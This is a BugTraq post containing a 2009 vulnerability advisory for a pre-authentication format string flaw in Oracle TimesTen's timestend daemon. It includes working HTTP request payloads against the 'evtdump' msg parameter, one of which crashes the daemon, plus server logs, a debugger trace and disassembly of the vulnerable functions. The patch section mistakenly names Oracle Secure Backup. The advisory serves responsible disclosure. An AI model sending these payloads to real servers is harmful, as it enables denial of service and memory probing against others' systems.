BugTraq
Oracle TimesTen Remote Format String Jan 14 2009 08:53PM
Joxean Koret (joxeankoret yahoo es)
Hi again,

Attached goes and advisory for the unique vulnerability in Oracle
TimesTen fixed in the Oracle Critical Patch Update January 2009.

Cheers!
Joxean Koret

Oracle TimesTen Remote Format String

====================================

Product Description

===================

Oracle TimesTen provides a family of real-time infrastructure software products

designed for low latency, high-volume data, event and transaction management.

Summary

=======

The Oracle January 2009 Critical Patch Update fixes a vulnerability which

allows a remote preauthenticated attacker to execute arbitrary code in the

context of the user running Oracle TimesTen server.

Affected versions

=================

Oracle TimesTen prior to version 7.0.5.1.0.

Vulnerability

=============

Oracle TimesTen's timestend daemon is a simple web server that process the

commands received from clients. Many of these commands are used without

being authenticated, i.e., without the need for a username and password.

The command "evtdump" dumps to the internal log file the contents of an

internal data structure. The pseudo-cgi evtdump only receives one parameter,

called msg. The parameter "msg" is a text that will be printed to the log

file before dumping the internal structure.

This parameter is vulnerable to a format string attack which leads to remote

code execution before being authenticated. The vulnerability have been tested

in Linux environments, although it appears to be vulnerable in all the

supported platforms.

The following is an extract of a communication between a custom client and

the timestend daemon (the output from the server is shown in the file

/var/TimesTen/log/ttmesg.log in Unix and GNU/Linux environments):

FROM CLIENT:

GET evtdump?msg=AAAA%2510$x%25s HTTP/1.0\r\n\r\n

AT SERVER:

(...)

# cat /var/TimesTen/log/ttmesg.log

(...)

19:05:07.01 Info: : 18225: maind 22: socket closed, calling recovery (last cmd was 25)

19:05:19.07 Info: : 18225: AAAA80a8a0c(null)

19:05:19.07 Info: : 18225: mode : TTDL_NORMAL

19:05:19.07 Info: : 18225: ctlfilename : ''

19:05:19.07 Info: : 18225: lineno : 0

19:05:19.07 Info: : 18225: nitems : 7

19:05:19.07 Info: : 18225: maxitems : 32

19:05:19.07 Info: : 18225: cur_path : (null)

19:05:19.07 Info: : 18225: lineno : 0

19:05:19.07 Info: : 18225: items :

19:05:19.07 Info: : 18225: item # 0 :

19:05:19.07 Info: : 18225: comp : ALL

19:05:19.07 Info: : 18225: level : 3

19:05:19.07 Info: : 18225: dsname : (null)

(...)

FROM CLIENT:

GET evtdump?msg=AAAA%2510$x%25s%25s%25s HTTP/1.0

AT SERVER:

(...)

# cat /var/TimesTen/log/ttmesg.log

19:05:19.08 Info: : 18225: maind 23: socket closed, calling recovery (last cmd was 26)

19:06:18.49 Info: : 18225: AAAA80a8a0c(null)(null)

19:06:18.49 Info: : 18225: mode : TTDL_NORMAL

19:06:18.49 Info: : 18225: ctlfilename : ''

19:06:18.49 Info: : 18225: lineno : 0

19:06:18.49 Info: : 18225: nitems : 7

19:06:18.49 Info: : 18225: maxitems : 32

19:06:18.49 Info: : 18225: cur_path : (null)

19:06:18.49 Info: : 18225: lineno : 0

19:06:18.49 Info: : 18225: items :

19:06:18.49 Info: : 18225: item # 0 :

19:06:18.49 Info: : 18225: comp : ALL

19:06:18.49 Info: : 18225: level : 3

19:06:18.49 Info: : 18225: dsname : (null)

(...)

FROM CLIENT:

GET evtdump?msg=AAAA%25n HTTP/1.0

AT SERVER:

(...)

# cat /var/TimesTen/log/ttmesg.log

19:07:38.87 Err : : 18782: TT14000: TimesTen daemon internal error: subd: Main daemon has vanished

19:07:38.87 Err : : 18785: TT14000: TimesTen daemon internal error: subd: Main daemon has vanished

19:07:38.87 Err : : 18788: TT14000: TimesTen daemon internal error: subd: Main daemon has vanished

19:07:38.87 Err : : 18791: TT14000: TimesTen daemon internal error: subd: Main daemon has vanished

19:07:38.87 Info: SRV: 18800: EventID=99| TimesTen daemon has disconnected, server is exiting...

19:07:39.54 Info: : 18785: Listener terminating

19:07:39.54 Info: : 18785: Listener exited, termination finishing

19:07:39.54 Info: : 18785: Process termination complete

19:07:39.59 Info: : 18791: Listener terminating

19:07:39.59 Info: : 18782: Listener terminating

19:07:39.59 Info: : 18788: Listener terminating

19:07:39.59 Info: : 18791: Listener exited, termination finishing

19:07:39.59 Info: : 18791: Process termination complete

19:07:39.59 Info: : 18782: Listener exited, termination finishing

19:07:39.59 Info: : 18782: Process termination complete

19:07:39.59 Info: : 18788: Listener exited, termination finishing

19:07:39.59 Info: : 18788: Process termination complete

19:07:40.59 Info: SRV: 18800: EventID=2| TimesTen Server is stopping

19:07:40.59 Info: SRV: 18800: EventID=99| Server trying to stop child server processes

19:07:40.59 Info: SRV: 18800: EventID=11| Main Server cleaned up all child server processes and exiting

(...)

The last msg parameter's value crashes the timestend daemon. Attaching with

a debugger to the timestend daemon we can see the following dump when it

crashes:

$ sudo /etc/init.d/tt_70 start &

(...)

$ sudo gdb attach `cat /var/TimesTen/tt70/timestend.pid`

(...)

(gdb) c

(...)

Program received signal SIGSEGV, Segmentation fault.

[Switching to Thread -1223386192 (LWP 18980)]

0xb76cf5c6 in vfprintf () from /lib/tls/i686/cmov/libc.so.6

(gdb) where

#0 0xb76cf5c6 in vfprintf () from /lib/tls/i686/cmov/libc.so.6

#1 0xb76eca36 in vsnprintf () from /lib/tls/i686/cmov/libc.so.6

#2 0xb7826ddb in ttc_vsnprintf () from /opt/TimesTen/tt70/lib/libttco.so

#3 0x0807689f in ttdLogDump ()

#4 0x0805b138 in daHandler ()

#5 0x08073789 in handlerThread ()

#6 0xb77e7341 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0

#7 0xb775a4ee in clone () from /lib/tls/i686/cmov/libc.so.6

(gdb) i r

eax 0x0 0

ecx 0x4 4

edx 0x0 0

ebx 0xb77bbadc -1216628004

esp 0xb71480c0 0xb71480c0

ebp 0xb71486e0 0xb71486e0

esi 0x0 0

edi 0xb714895c -1223390884

eip 0xb76cf5c6 0xb76cf5c6 <vfprintf+14038>

(...)

The function ttdLogDump is called from daHandler as you can see in the

backtrace. This function is the main handler for the internal timestend's web

server. This is the vulnerable function, ttdLogDump, which receives one

argument (the msg parameter to the evtdump pseudo cgi):

(...)

.text:0807686D ttdLogDump proc near ; CODE XREF: daHandler+5F3p

(...)

.text:08076879 lea eax, [ebp+argRet]

.text:0807687C push eax

.text:0807687D push [ebp+argMsg] ; User controlled string buffer

.text:08076880 push 0

.text:08076882 push 100h

.text:08076887 lea esi, [ebp+buf]

.text:0807688D call $+5

.text:08076892 pop ebx

.text:08076893 add ebx, 3217Ah

.text:08076899 push esi

.text:0807689A call _ttc_vsnprintf

(...)

The function ttc_vsnprintf makes a call internally to the vsnprintf function

(in the library /opt/TimesTen/tt70/lib/libttco.so) passing as the buffer to

be printed the user supplied value passed to the "msg" argument:

.text:0001ADAA ttc_vsnprintf proc near ; CODE XREF: msgbuf_error+73p

.text:0001ADAA ; opt_error+83p ...

.text:0001ADAA

(...)

.text:0001ADCE push [ebp+arg] ; arg

.text:0001ADD1 push [ebp+argFormat] ; format

.text:0001ADD4 push edi ; maxlen

.text:0001ADD5 push eax ; s

.text:0001ADD6 call _vsnprintf

(..)

Workaround

==========

None.

Patch information

=================

Oracle fixed the vulnerability in version 7.0.5.1.0 of Oracle Secure Backup.

Contact Information

===================

The vulnerability was found by Joxean Koret, admin[at]joxeankoret[dot]com

References

==========

Oracle TimesTen evtDump Remote Format String Vulnerability:

http://www.zerodayinitiative.com/advisories/ZDI-09-004/

Oracle Critical Patch Update January 2009:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/
cpujan2009.html

Permanent Version of the advisory:

http://joxeankoret.com/blog/?p=41

Professional Web:

http://www.joxeankoret.com

Personal Blog:

http://www.joxeankoret.com/blog

Disclaimer

==========

The information in this advisory and any of its demonstrations is provided "as is"

without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of using the

information or demonstrations provided in any part of this advisory.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQBJblCxU6rFMEYDrlERAvfmAKCfnouWGL44+W+m6QhCXFyEVfe9oQCePOai
gBwnwN7WacqQnTmRlcUhk0g=
=SPQv
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus